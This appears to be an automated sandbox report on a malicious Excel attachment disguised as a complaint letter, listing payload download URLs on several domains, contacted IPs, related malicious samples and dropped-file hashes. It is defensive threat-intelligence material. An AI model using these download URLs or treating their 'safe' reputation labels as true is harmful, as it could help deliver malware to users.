    SourceDetectionScannerLabelLink
    http://jayshreewoods.com/gvazzbwlvyk/44250678185879600000.dat0%Avira URL Cloudsafe
    http://sportsmarquee.com/hmffuzbolyio/44250678185879600000.dat0%Avira URL Cloudsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://raivens.com/zdmqwymhhza/44250678185879600000.dat0%Avira URL Cloudsafe
    http://erp.demosoftware.biz/focahjqevd/44250678185879600000.dat0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    parama-college.id
    203.142.76.236
    truefalseunknown
    erp.demosoftware.biz
    58.96.102.67
    truefalseunknown
    sportsmarquee.com
    70.32.104.19
    truefalseunknown
    raivens.com
    159.89.174.35
    truefalseunknown
    jayshreewoods.com
    13.126.100.34
    truefalse
      unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://jayshreewoods.com/gvazzbwlvyk/44250678185879600000.datfalse
      • Avira URL Cloud: safe
      unknown
      http://sportsmarquee.com/hmffuzbolyio/44250678185879600000.datfalse
      • Avira URL Cloud: safe
      unknown
      http://raivens.com/zdmqwymhhza/44250678185879600000.datfalse
      • Avira URL Cloud: safe
      unknown
      http://erp.demosoftware.biz/focahjqevd/44250678185879600000.datfalse
      • Avira URL Cloud: safe
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000004.00000002.2201804166.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192488576.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183410930.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180940139.0000000001DE7000.00000002.00000001.sdmpfalse
        high
        http://www.windows.com/pctv.rundll32.exe, 00000007.00000002.2180715449.0000000001C00000.00000002.00000001.sdmpfalse
          high
          http://investor.msn.comrundll32.exe, 00000004.00000002.2201614246.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192301052.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183231178.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180715449.0000000001C00000.00000002.00000001.sdmpfalse
            high
            http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000004.00000002.2201614246.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192301052.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183231178.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180715449.0000000001C00000.00000002.00000001.sdmpfalse
              high
              http://www.icra.org/vocabulary/.rundll32.exe, 00000004.00000002.2201804166.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192488576.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183410930.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180940139.0000000001DE7000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000004.00000002.2201804166.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192488576.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183410930.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180940139.0000000001DE7000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.hotmail.com/oerundll32.exe, 00000004.00000002.2201614246.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192301052.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183231178.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180715449.0000000001C00000.00000002.00000001.sdmpfalse
                high
                http://investor.msn.com/rundll32.exe, 00000004.00000002.2201614246.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192301052.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183231178.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180715449.0000000001C00000.00000002.00000001.sdmpfalse
                  high

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  13.126.100.34
                  unknownUnited States
                  16509AMAZON-02USfalse
                  159.89.174.35
                  unknownUnited States
                  14061DIGITALOCEAN-ASNUSfalse
                  58.96.102.67
                  unknownAustralia
                  10143EXETEL-AS-APExetelPtyLtdAUfalse
                  203.142.76.236
                  unknownIndonesia
                  17451BIZNET-AS-APBIZNETNETWORKSIDfalse
                  70.32.104.19
                  unknownUnited States
                  398110GO-DADDY-COM-LLCUSfalse

                  General Information

                  Joe Sandbox Version:31.0.0 Emerald
                  Analysis ID:356762
                  Start date:23.02.2021
                  Start time:16:15:31
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 6m 35s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:Complaint_Letter_1186814227-02192021.xls
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:10
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal76.expl.evad.winXLS@11/13@5/5
                  EGA Information:Failed
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .xls
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Found warning dialog
                  • Click Ok
                  • Found warning dialog
                  • Click Ok
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                  • TCP Packets have been reduced to 100
                  • Excluded IPs from analysis (whitelisted): 192.35.177.64, 2.20.142.209, 2.20.142.210
                  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, apps.identrust.com, au-bg-shim.trafficmanager.net
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.

                  Simulations

                  Behavior and APIs

                  No simulations

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  AMAZON-02USYFZX6dTsiT.exeGet hashmaliciousBrowse
                  • 3.22.15.135
                  xKeHI0tf38.exeGet hashmaliciousBrowse
                  • 3.13.191.225
                  seed.exeGet hashmaliciousBrowse
                  • 52.217.45.220
                  OutplayedInstaller (1).exeGet hashmaliciousBrowse
                  • 99.86.159.128
                  Facecheck - app-Installer (1).exeGet hashmaliciousBrowse
                  • 99.86.159.102
                  Buff-Installer (9).exeGet hashmaliciousBrowse
                  • 13.226.162.82
                  firefox-3.0.0.zipGet hashmaliciousBrowse
                  • 13.226.162.116
                  MT OCEAN STAR ISO 8217 2005.xlsxGet hashmaliciousBrowse
                  • 54.67.62.204
                  QTN3C2AF414EDF9_041873.xlsxGet hashmaliciousBrowse
                  • 52.57.196.177
                  TIC ENQ2040 FCl.xlsxGet hashmaliciousBrowse
                  • 54.67.57.56
                  MV ASIA EMERALD II.xlsxGet hashmaliciousBrowse
                  • 54.67.57.56
                  TRANSIT MANIFEST CARGO FORM.xlsxGet hashmaliciousBrowse
                  • 54.67.120.65
                  8TD8GfTtaW.exeGet hashmaliciousBrowse
                  • 104.192.141.1
                  R4VugGhHOo.exeGet hashmaliciousBrowse
                  • 18.197.52.125
                  RFQ.exeGet hashmaliciousBrowse
                  • 52.58.78.16
                  ORDER SPECIFICATIONS.exeGet hashmaliciousBrowse
                  • 13.57.130.120
                  22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                  • 35.158.240.78
                  ORDER LIST.xlsxGet hashmaliciousBrowse
                  • 54.67.62.204
                  BL + PL + CI.xlsxGet hashmaliciousBrowse
                  • 54.67.120.65
                  #U007einvoice#U007eSC00978656.xlsxGet hashmaliciousBrowse
                  • 54.67.57.56
                  EXETEL-AS-APExetelPtyLtdAUapp.exe.exeGet hashmaliciousBrowse
                  • 220.233.178.199
                  DIGITALOCEAN-ASNUSQuotation Reques.exeGet hashmaliciousBrowse
                  • 138.197.103.178
                  NewOrder.xlsmGet hashmaliciousBrowse
                  • 167.99.202.53
                  rieuro.dllGet hashmaliciousBrowse
                  • 206.189.10.247
                  document-1915351743.xlsGet hashmaliciousBrowse
                  • 206.189.10.247
                  DHL_Shipment_Notification#5436637389_22_FEB.exeGet hashmaliciousBrowse
                  • 165.22.240.4
                  124992436.docxGet hashmaliciousBrowse
                  • 68.183.127.92
                  124992436.docxGet hashmaliciousBrowse
                  • 68.183.127.92
                  iopjvdf.dllGet hashmaliciousBrowse
                  • 206.189.10.247
                  document-750895311.xlsGet hashmaliciousBrowse
                  • 206.189.10.247
                  Shinshin Machinery.exeGet hashmaliciousBrowse
                  • 167.99.187.230
                  HEC Batangas Integrated LNG and Power Project DocumentationsType a message.exe.exeGet hashmaliciousBrowse
                  • 206.189.50.215
                  processhacker-2.39-setup.exeGet hashmaliciousBrowse
                  • 162.243.25.33
                  PO#652.exeGet hashmaliciousBrowse
                  • 192.241.148.82
                  Linux_Reader.exeGet hashmaliciousBrowse
                  • 159.203.148.225
                  IU-8549 Medical report COVID-19.docGet hashmaliciousBrowse
                  • 134.209.144.106
                  Statement_of_Account_as_of 02_17_2021.xlsmGet hashmaliciousBrowse
                  • 167.71.6.214
                  Quotation.exeGet hashmaliciousBrowse
                  • 67.207.77.53
                  MoqGIIogN0.dllGet hashmaliciousBrowse
                  • 192.241.174.45
                  dAIyRK9gO7.exeGet hashmaliciousBrowse
                  • 138.197.53.157
                  tS9P6wPz9x.exeGet hashmaliciousBrowse
                  • 142.93.110.250
                  BIZNET-AS-APBIZNETNETWORKSIDSign_1136845514-2138034493.xlsGet hashmaliciousBrowse
                  • 182.253.107.34
                  SecuriteInfo.com.Exploit.Siggen3.10048.21627.xlsGet hashmaliciousBrowse
                  • 182.253.107.34
                  vJHWQgfJ23.exeGet hashmaliciousBrowse
                  • 118.99.94.149
                  _161213.exeGet hashmaliciousBrowse
                  • 112.78.142.170
                  _161212.exeGet hashmaliciousBrowse
                  • 112.78.142.170
                  _161212.exeGet hashmaliciousBrowse
                  • 112.78.142.170
                  _161212.exeGet hashmaliciousBrowse
                  • 112.78.142.170
                  _161214.exeGet hashmaliciousBrowse
                  • 112.78.142.170
                  _161212.exeGet hashmaliciousBrowse
                  • 112.78.142.170
                  _161212.exeGet hashmaliciousBrowse
                  • 112.78.142.170
                  _161212.exeGet hashmaliciousBrowse
                  • 112.78.142.170
                  _161213.exeGet hashmaliciousBrowse
                  • 112.78.142.170
                  _161214.exeGet hashmaliciousBrowse
                  • 112.78.142.170
                  _161213.exeGet hashmaliciousBrowse
                  • 112.78.142.170
                  _161213.exeGet hashmaliciousBrowse
                  • 112.78.142.170
                  _103330.exeGet hashmaliciousBrowse
                  • 112.78.142.170
                  _103331.exeGet hashmaliciousBrowse
                  • 112.78.142.170
                  _103330.exeGet hashmaliciousBrowse
                  • 112.78.142.170
                  _103330.exeGet hashmaliciousBrowse
                  • 112.78.142.170
                  _103330.exeGet hashmaliciousBrowse
                  • 112.78.142.170

                  JA3 Fingerprints

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  7dcce5b76c8b17472d024758970a406bComplaint-1992179913-02182021.xlsGet hashmaliciousBrowse
                  • 13.126.100.34
                  • 159.89.174.35
                  Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                  • 13.126.100.34
                  • 159.89.174.35
                  mexhlc.xlsxGet hashmaliciousBrowse
                  • 13.126.100.34
                  • 159.89.174.35
                  document-550193913.xlsGet hashmaliciousBrowse
                  • 13.126.100.34
                  • 159.89.174.35
                  document-1915351743.xlsGet hashmaliciousBrowse
                  • 13.126.100.34
                  • 159.89.174.35
                  SecuriteInfo.com.Heur.15528.xlsGet hashmaliciousBrowse
                  • 13.126.100.34
                  • 159.89.174.35
                  Subconract 504.xlsmGet hashmaliciousBrowse
                  • 13.126.100.34
                  • 159.89.174.35
                  upbck.xlsxGet hashmaliciousBrowse
                  • 13.126.100.34
                  • 159.89.174.35
                  IMG_6078_SCANNED.docGet hashmaliciousBrowse
                  • 13.126.100.34
                  • 159.89.174.35
                  RFQ Manual Supersucker en Espaol.xlsxGet hashmaliciousBrowse
                  • 13.126.100.34
                  • 159.89.174.35
                  _a6590.docxGet hashmaliciousBrowse
                  • 13.126.100.34
                  • 159.89.174.35
                  Small Charities.xlsxGet hashmaliciousBrowse
                  • 13.126.100.34
                  • 159.89.174.35
                  quotation10204168.dox.xlsxGet hashmaliciousBrowse
                  • 13.126.100.34
                  • 159.89.174.35
                  notice of arrival.xlsxGet hashmaliciousBrowse
                  • 13.126.100.34
                  • 159.89.174.35
                  22-2-2021 .xlsxGet hashmaliciousBrowse
                  • 13.126.100.34
                  • 159.89.174.35
                  Shipping_Document.xlsxGet hashmaliciousBrowse
                  • 13.126.100.34
                  • 159.89.174.35
                  Remittance copy.xlsxGet hashmaliciousBrowse
                  • 13.126.100.34
                  • 159.89.174.35
                  CI + PL.xlsxGet hashmaliciousBrowse
                  • 13.126.100.34
                  • 159.89.174.35
                  RFQ_Enquiry_0002379_.xlsxGet hashmaliciousBrowse
                  • 13.126.100.34
                  • 159.89.174.35
                  124992436.docxGet hashmaliciousBrowse
                  • 13.126.100.34
                  • 159.89.174.35

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                  Category:dropped
                  Size (bytes):59134
                  Entropy (8bit):7.995450161616763
                  Encrypted:true
                  SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                  MD5:E92176B0889CC1BB97114BEB2F3C1728
                  SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                  SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                  SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):893
                  Entropy (8bit):7.366016576663508
                  Encrypted:false
                  SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                  MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                  SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                  SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                  SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):328
                  Entropy (8bit):3.070945767762452
                  Encrypted:false
                  SSDEEP:6:kKwkHbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:5u3kPlE99SNxAhUeo+aKt
                  MD5:1213E096B9224B4495C4F78601704789
                  SHA1:1EF0ABAD73D4A985BD80F4F8B6B760225E2D7AA1
                  SHA-256:A9D73418788038DAE293776D59BEC80CB8EB62CBC4BA0C689F9CD7AB1BCB0181
                  SHA-512:FDA963840A69EE3B027FDA823BC8D945489D4EACB93FB921999442424F4FAFC12FE6206323B28B43E1982CB18B510F0D5C78088DA6C6C514D7861D1D7D7561B9
                  Malicious:false
                  Reputation:low
                  Preview: p...... ........va.QB...(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):252
                  Entropy (8bit):3.0294634724686764
                  Encrypted:false
                  SSDEEP:3:kkFklwkfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kK5aliBAIdQZV7eAYLit
                  MD5:28129F6ECC58852F1AE4AE09A12AC008
                  SHA1:35ACF528D1F3C26C73CCC2E1DE542D86999D0C1B
                  SHA-256:09898C2DEE4D74001B9D5AAC04C1D235CBD0306F509942B4320ADD01B550E653
                  SHA-512:91EF006A4CB425DF99FD69D9B944E6023A40BB66D546A48ED402D84E1F6BB6E7FF3698E14E987E21565C32A6210F849346D74B89825BC91AB738B15A6E2F97C7
                  Malicious:false
                  Reputation:low
                  Preview: p...... ....`.....QB...(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44250678185879600000[1].htm
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:HTML document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):162
                  Entropy (8bit):4.43530643106624
                  Encrypted:false
                  SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
                  MD5:4F8E702CC244EC5D4DE32740C0ECBD97
                  SHA1:3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
                  SHA-256:9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
                  SHA-512:21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview: <html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..
                  C:\Users\user\AppData\Local\Temp\B1CE0000
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):31749
                  Entropy (8bit):7.6478755803057545
                  Encrypted:false
                  SSDEEP:384:TkBP+gnPEeQXelsUCI8aoVT0QNuzWKPqSFZWWvj1ChWZ3UtjIRrhs7+nOt5O:TkBP+qPEvHXW+u7qSzn1AwUCm5O
                  MD5:0B92F5CE699D9908F484814A6E394592
                  SHA1:10C4598491B10B32CB5B59BB8BCFEF9F1F91860B
                  SHA-256:26DF7450FCEDA4FF99B5C57BC9B9EF77BE32960CB475574BD0880529A6C0AF05
                  SHA-512:D8804CB0471C072EC26C14E92E91472C20C190CFD9D12820E2FB36B49E2D351BCD45CC99653F407AB14FC313FFA37112A042B77E540AA4A6A15362B7D0E6E687
                  Malicious:false
                  Reputation:low
                  Preview: .U.n.0....?......(..r.Mrl.$...\K....I..v..pl).E.R.3;+.N.V.TO.Q{..f.*p.+..y......pJ..ek@v5..i.........O)...e.V`..8.Y.hE.... .Rt./'.o\z...:..l6...x4..Y..FIp..~n..T-.6..:?..k...!.-E....S{.j.Xh...GKb...... Y..Ic.....|.3..q.[..B.a.._.w...[.^g.....F....1.....+.}\._6.dk,..`...c.........(<.T....b....x5r&%...E.X!......\..w<M....\.7..9.........m..b.E.u...u.]...'t.(....}8..m...C~..E.....?..Z.]..i.D.O..B3....b.k..Z....x.A.yJ)P..y...........PK..........!........V.......[Content_Types].xml ...(.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Temp\CabD164.tmp
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                  Category:dropped
                  Size (bytes):59134
                  Entropy (8bit):7.995450161616763
                  Encrypted:true
                  SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                  MD5:E92176B0889CC1BB97114BEB2F3C1728
                  SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                  SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                  SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                  Malicious:false
                  Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                  C:\Users\user\AppData\Local\Temp\TarD165.tmp
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):152788
                  Entropy (8bit):6.316654432555028
                  Encrypted:false
                  SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                  MD5:64FEDADE4387A8B92C120B21EC61E394
                  SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                  SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                  SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                  Malicious:false
                  Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Complaint_Letter_1186814227-02192021.LNK
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Tue Feb 23 23:16:35 2021, atime=Tue Feb 23 23:16:35 2021, length=57856, window=hide
                  Category:dropped
                  Size (bytes):2288
                  Entropy (8bit):4.5046992261100005
                  Encrypted:false
                  SSDEEP:48:82E1/XT3InX4KstZc64KsPqQh22E1/XT3InX4KstZc64KsPqQ/:82E1/XLInoK+IKoqQh22E1/XLInoK+IT
                  MD5:AA1AC6204DBA6B8233FBE8E75046EDBF
                  SHA1:5F0460E7005BE1F11CF156CF88EA554BFC32E280
                  SHA-256:6416DD5F9D52578CF84CFDACD2F2BAC36F371CAC1A165C23585889664682BAE1
                  SHA-512:98B0590AFD524B7EC11E322865D78BE12D26FFB4D9B4F453634CA59FD62B53840C273C5C6EC0FA5379431C41EA0B91E26B54A39A39150373DB1DBE9CD1F12EC1
                  Malicious:false
